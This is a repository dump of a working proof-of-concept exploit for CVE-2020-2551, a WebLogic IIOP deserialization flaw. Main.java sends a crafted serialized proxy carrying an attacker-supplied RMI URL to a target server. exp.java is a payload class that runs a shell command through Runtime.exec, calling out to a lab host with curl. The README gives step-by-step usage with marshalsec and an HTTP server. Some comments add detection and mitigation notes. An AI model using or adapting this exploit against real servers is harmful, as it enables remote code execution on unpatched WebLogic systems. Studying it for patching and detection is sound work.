Repository: Y4er/CVE-2020-2551
Branch: master
Commit: 81ce92ab8def
Files: 12
Total size: 52.5 MB
Directory structure:
gitextract_0f86yukl/
├── .gitignore
├── Makefile
├── README.md
├── build.xml
├── src/
│ ├── META-INF/
│ │ └── MANIFEST.MF
│ ├── com/
│ │ └── payload/
│ │ └── Main.java
│ ├── exp.java
│ └── lib/
│ ├── com.bea.core.repackaged.apache.commons.logging_1.2.1.jar
│ ├── com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar
│ ├── permit-reflect-0.3.jar
│ └── wlfullclient.jar
└── weblogic_CVE_2020_2551.iml
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
# Created by .ignore support plugin (hsz.mobi)
### Java template
# Compiled class file
*.class
# Log file
*.log
# BlueJ files
*.ctxt
# Mobile Tools for Java (J2ME)
.mtj.tmp/
# Package Files #
*.war
*.nar
*.ear
*.zip
*.tar.gz
*.rar
# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
hs_err_pid*
.idea
out
================================================
FILE: Makefile
================================================
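# Build the runnable jar with Ant (see build.xml), then compile the standalone
# payload source with the local javac. The README recommends compiling exp.java
# with the same JDK as the target, so this javac line is a convenience only.
# `all` produces no file of that name, so it is declared phony.
.PHONY: all
all:
	ant run
	javac src/exp.java
	#cd src; sudo python3 -m http.server 80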
================================================
FILE: README.md
================================================
## CVE-2020-2551
WebLogic IIOP 反序列化漏洞
## 测试环境
WebLogic 10.3.6 + JDK 1.6
[打包好的jar包](https://pan.baidu.com/s/1WancKEtKzXDxwWP0zz3QPg) 提取码:a6ob
## 漏洞利用
下载jar包,然后使用marshalsec起一个恶意的RMI服务,本地编译一个exp.java
```java
package payload;
import java.io.IOException;
public class exp {
public exp() {
String cmd = "curl http://172.16.1.1/success";
try {
Runtime.getRuntime().exec(cmd).getInputStream();
} catch (IOException e) {
e.printStackTrace();
}
}
}
```
**尽量使用和weblogic相同的jdk版本和依赖库(wlfullclient.jar)编译** 然后本地起一个web服务器
```
python -m http.server --bind 0.0.0.0 80
```
命令行运行jar包
```
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
```
实际效果如图

## 已知问题
很多小伙伴都说复现不成功,看了网上的一些文章发现IIOP存在nat模式的问题,今天发现先知上有了 https://xz.aliyun.com/t/7498 各位自行移步。
## 参考
https://y4er.com/post/weblogic-cve-2020-2551/
================================================
FILE: build.xml
================================================
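<project name="weblogic_CVE_2020_2551" basedir=".">
    <!-- Ant build for the CVE-2020-2551 proof of concept described in README.md.
         Every jar under src/lib (including the 52.5 MB wlfullclient.jar) is merged
         into one runnable jar via zipgroupfileset. -->
    <property name="lib.dir" value="src/lib"/>
    <property name="src.dir" value="src"/>
    <property name="build.dir" value="build"/>
    <property name="classes.dir" value="${build.dir}/classes"/>
    <property name="jar.dir" value="${build.dir}/jar"/>
    <property name="jar.dir.tmp" value="${build.dir}/jar.tmp"/>
    <!-- Manifest Main-Class value (slash form kept as the author wrote it); it is
         now referenced from the jar target instead of being repeated there. -->
    <property name="main-class" value="com/payload/Main"/>

    <path id="classpath">
        <fileset dir="${lib.dir}" includes="**/*.jar"/>
    </path>

    <target name="clean">
        <delete dir="${build.dir}"/>
    </target>

    <target name="compile">
        <mkdir dir="${classes.dir}"/>
        <!-- destdir uses classes.dir (was a hard-coded "build/classes") so compile,
             jar and clean agree on the output location. encoding is pinned because
             Main.java contains non-ASCII string literals that the platform default
             charset may garble; includeantruntime silences the Ant 1.8+ warning. -->
        <javac srcdir="${src.dir}" target="1.6" source="1.6" destdir="${classes.dir}"
               classpathref="classpath" encoding="UTF-8" includeantruntime="false"/>
    </target>

    <target name="jar" depends="compile">
        <mkdir dir="${jar.dir}"/>
        <jar destfile="${jar.dir}/${ant.project.name}.jar" basedir="${classes.dir}">
            <manifest>
                <attribute name="Main-Class" value="${main-class}"/>
            </manifest>
            <!-- was a second hard-coded "src/lib"; lib.dir is the single source of truth -->
            <zipgroupfileset dir="${lib.dir}"/>
        </jar>
    </target>

    <!-- Runs the jar with no arguments, which only prints Main's usage text. -->
    <target name="run" depends="jar">
        <java jar="${jar.dir}/${ant.project.name}.jar" fork="true"/>
    </target>
</project>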
================================================
FILE: src/META-INF/MANIFEST.MF
================================================
Manifest-Version: 1.0
Main-Class: com.payload.Main
================================================
FILE: src/com/payload/Main.java
================================================
package com.payload;
import com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager;
import com.nqzero.permit.Permit;
import javax.naming.Context;
import javax.naming.InitialContext;
import java.lang.reflect.*;
import java.rmi.Remote;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;
/**
 * Proof-of-concept client for CVE-2020-2551 (WebLogic IIOP deserialization),
 * as described in README.md.
 *
 * <p>What the code visibly does: it opens a WebLogic JNDI {@link InitialContext}
 * over an {@code iiop://host:port} provider URL, builds a {@code JtaTransactionManager}
 * whose user-transaction name is set to the caller-supplied RMI URL, places it in a
 * single-entry map behind a {@code java.lang.reflect.Proxy} driven by the JDK-internal
 * {@code sun.reflect.annotation.AnnotationInvocationHandler}, and sends that proxy to
 * the server with {@code Context.rebind}. NOTE(review): the lookup of the embedded RMI
 * URL is presumed to happen when the server deserializes the bound object — confirm
 * against the vendor advisory for this CVE; nothing in this file performs it locally.
 *
 * <p>Defensive notes: on the wire this is an IIOP {@code rebind} carrying a serialized
 * proxy; the bound name starts with {@code "Y4er"} and the map key with {@code "pwned"}
 * (both suffixed with {@code System.nanoTime()}), which are usable detection markers for
 * this particular tool. Mitigation is the vendor fix for CVE-2020-2551 and not exposing
 * the IIOP listener to untrusted networks. The tool has no success check (see
 * {@link #main}).
 */
public class Main {
    /** JDK-internal class instantiated reflectively in {@link #createMemoizedInvocationHandler}. */
    public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";

    /**
     * Entry point: {@code rhost rport rmiurl}. With any other argument count it prints
     * usage text (partly in Chinese) and exits 0. The jar name in the usage text
     * ({@code IIOP_CVE_2020_2551.jar}) differs from the one build.xml produces
     * ({@code weblogic_CVE_2020_2551.jar}). Any exception is printed, followed by a
     * banner saying there is no echo and the result must be verified by hand.
     *
     * @param args target host, target port, RMI URL to embed in the payload; none are validated
     */
    public static void main(String[] args) {
        try {
            if (args.length != 3) {
                System.out.println("java -jar IIOP_CVE_2020_2551.jar rhost rport rmiurl");
                System.out.println("java -jar IIOP_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp");
                System.out.println("先起一个RMIRefServer服务");
                System.out.println("java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer \"http://172.16.1.1/#exp\" 1099");
                System.out.println("jdk1.6\\bin\\javac exp.java 将生成的exp.class放入当前目录");
                System.out.println("exp.class目录起一个WEB服务 python3 -m http.server --bind 0.0.0.0 80");
                System.out.println("test on weblogic 10.3.6 success!");
                System.out.println("welcome to myblog: http://Y4er.com");
                System.exit(0);
            }
            String ip = args[0];
            String port = args[1];
            String rmiurl = args[2];
            // JNDI provider URL over IIOP; host and port are used verbatim
            String rhost = String.format("iiop://%s:%s", ip, port);
            Hashtable<String, String> env = new Hashtable<String, String>();
            // add wlsserver/server/lib/weblogic.jar to classpath,else will error.
            env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
            env.put("java.naming.provider.url", rhost);
            Context context = new InitialContext(env);
            // get Object to Deserialize
            JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
            // the caller-supplied RMI URL is stored as the manager's user-transaction name
            jtaTransactionManager.setUserTransactionName(rmiurl);
            // map key and bound name carry System.nanoTime() so repeated runs do not collide;
            // both prefixes ("pwned", "Y4er") are fixed and therefore observable server-side
            Remote remote = createMemoitizedProxy(createMap("pwned"+System.nanoTime(), jtaTransactionManager), Remote.class);
            context.rebind("Y4er"+System.nanoTime(), remote);
        } catch (Exception ex) {
            // any failure (connection, naming, server-side) ends here; no success signal exists
            ex.printStackTrace();
            System.out.println("------------------------");
            System.out.println("----没有回显 自行检测----");
            System.out.println("------------------------");
        }
    }

    /**
     * Builds a proxy for {@code iface} (plus {@code ifaces}) whose invocation handler is an
     * {@code AnnotationInvocationHandler} over {@code map}. The misspelling "Memoitized" is
     * kept because the name is public API of this class.
     *
     * @param map    backing map handed to the invocation handler
     * @param iface  primary interface the proxy implements; the result is cast to it
     * @param ifaces additional interfaces, may be empty
     * @return the proxy instance
     * @throws Exception propagated from the reflective construction of the handler
     */
    public static <T> T createMemoitizedProxy(final Map<String, Object> map, final Class<T> iface, final Class<?>... ifaces) throws Exception {
        return createProxy(createMemoizedInvocationHandler(map), iface, ifaces);
    }

    /**
     * Instantiates the JDK-internal {@code AnnotationInvocationHandler} through its first
     * declared constructor with the arguments {@code (Override.class, map)}. Depends on
     * internal JDK layout; see {@link #getFirstCtor} for the ordering caveat.
     *
     * @param map backing map for the handler
     * @return the handler, cast to {@link InvocationHandler}
     * @throws Exception if the class cannot be loaded or the constructor call fails
     */
    public static InvocationHandler createMemoizedInvocationHandler(final Map<String, Object> map) throws Exception {
        return (InvocationHandler) getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
    }

    /**
     * Loads the named class and returns its first declared constructor, made accessible.
     * {@code getDeclaredConstructors()} does not guarantee any order, so index 0 is only
     * reliable while the target class has exactly one constructor.
     *
     * @param name fully qualified class name
     * @return the (now accessible) constructor
     * @throws Exception if the class cannot be loaded
     */
    public static Constructor<?> getFirstCtor(final String name) throws Exception {
        final Constructor<?> ctor = Class.forName(name).getDeclaredConstructors()[0];
        setAccessible(ctor);
        return ctor;
    }

    /**
     * Opens {@code member} for reflective access via the bundled permit-reflect library
     * (src/lib/permit-reflect-0.3.jar) rather than {@code AccessibleObject.setAccessible}.
     *
     * @param member reflective member to open
     */
    public static void setAccessible(AccessibleObject member) {
        // quiet runtime warnings from JDK9+
        Permit.setAccessible(member);
    }

    /**
     * Creates a {@code java.lang.reflect.Proxy} implementing {@code iface} first and then
     * {@code ifaces}, defined by this class's class loader.
     *
     * @param ih     handler receiving every method call on the proxy
     * @param iface  primary interface; the result is cast to it
     * @param ifaces further interfaces, may be empty
     * @return the proxy cast to {@code iface}
     */
    public static <T> T createProxy(final InvocationHandler ih, final Class<T> iface, final Class<?>... ifaces) {
        // slot 0 is the primary interface, the varargs follow it
        final Class<?>[] allIfaces = (Class<?>[]) Array.newInstance(Class.class, ifaces.length + 1);
        allIfaces[0] = iface;
        if (ifaces.length > 0) {
            System.arraycopy(ifaces, 0, allIfaces, 1, ifaces.length);
        }
        return iface.cast(Proxy.newProxyInstance(Main.class.getClassLoader(), allIfaces, ih));
    }

    /**
     * Returns a new mutable {@link HashMap} holding the single entry {@code key -> val}.
     *
     * @param key map key
     * @param val map value
     * @return a fresh one-entry map
     */
    public static Map<String, Object> createMap(final String key, final Object val) {
        final Map<String, Object> map = new HashMap<String, Object>();
        map.put(key, val);
        return map;
    }
}
================================================
FILE: src/exp.java
================================================
package payload;
import java.io.IOException;
/**
 * Payload class from the README's "漏洞利用" section: it is compiled separately
 * (the README advises using the same JDK as the target) and served over HTTP so the
 * RMI reference server listed there can hand it out. The package is {@code payload}
 * although the file sits at src/exp.java.
 *
 * <p>The constructor only runs {@code curl} against the hard-coded lab address
 * 172.16.1.1 and discards the process. For a defender, the observable effect is an
 * outbound HTTP request to that address from the WebLogic server process; the URL
 * is fixed here and would have to be edited and recompiled to point anywhere else.
 */
public class exp {
    /** Runs the hard-coded command once; an {@link IOException} is only printed. */
    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            // the Process and its stream are neither read nor closed
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
================================================
FILE: src/lib/wlfullclient.jar
================================================
[File too large to display: 52.5 MB]
================================================
FILE: weblogic_CVE_2020_2551.iml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<module type="JAVA_MODULE" version="4">
<component name="NewModuleRootManager" inherit-compiler-output="true">
<exclude-output />
<content url="file://$MODULE_DIR$">
<sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
</content>
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
<orderEntry type="library" name="lib" level="project" />
</component>
</module>
SYMBOL INDEX (10 symbols across 2 files)
FILE: src/com/payload/Main.java
class Main (line 14) | public class Main {
method main (line 18) | public static void main(String[] args) {
method createMemoitizedProxy (line 55) | public static <T> T createMemoitizedProxy(final Map<String, Object> ma...
method createMemoizedInvocationHandler (line 59) | public static InvocationHandler createMemoizedInvocationHandler(final ...
method getFirstCtor (line 63) | public static Constructor<?> getFirstCtor(final String name) throws Ex...
method setAccessible (line 69) | public static void setAccessible(AccessibleObject member) {
method createProxy (line 74) | public static <T> T createProxy(final InvocationHandler ih, final Clas...
method createMap (line 83) | public static Map<String, Object> createMap(final String key, final Ob...
FILE: src/exp.java
class exp (line 5) | public class exp {
method exp (line 7) | public exp() {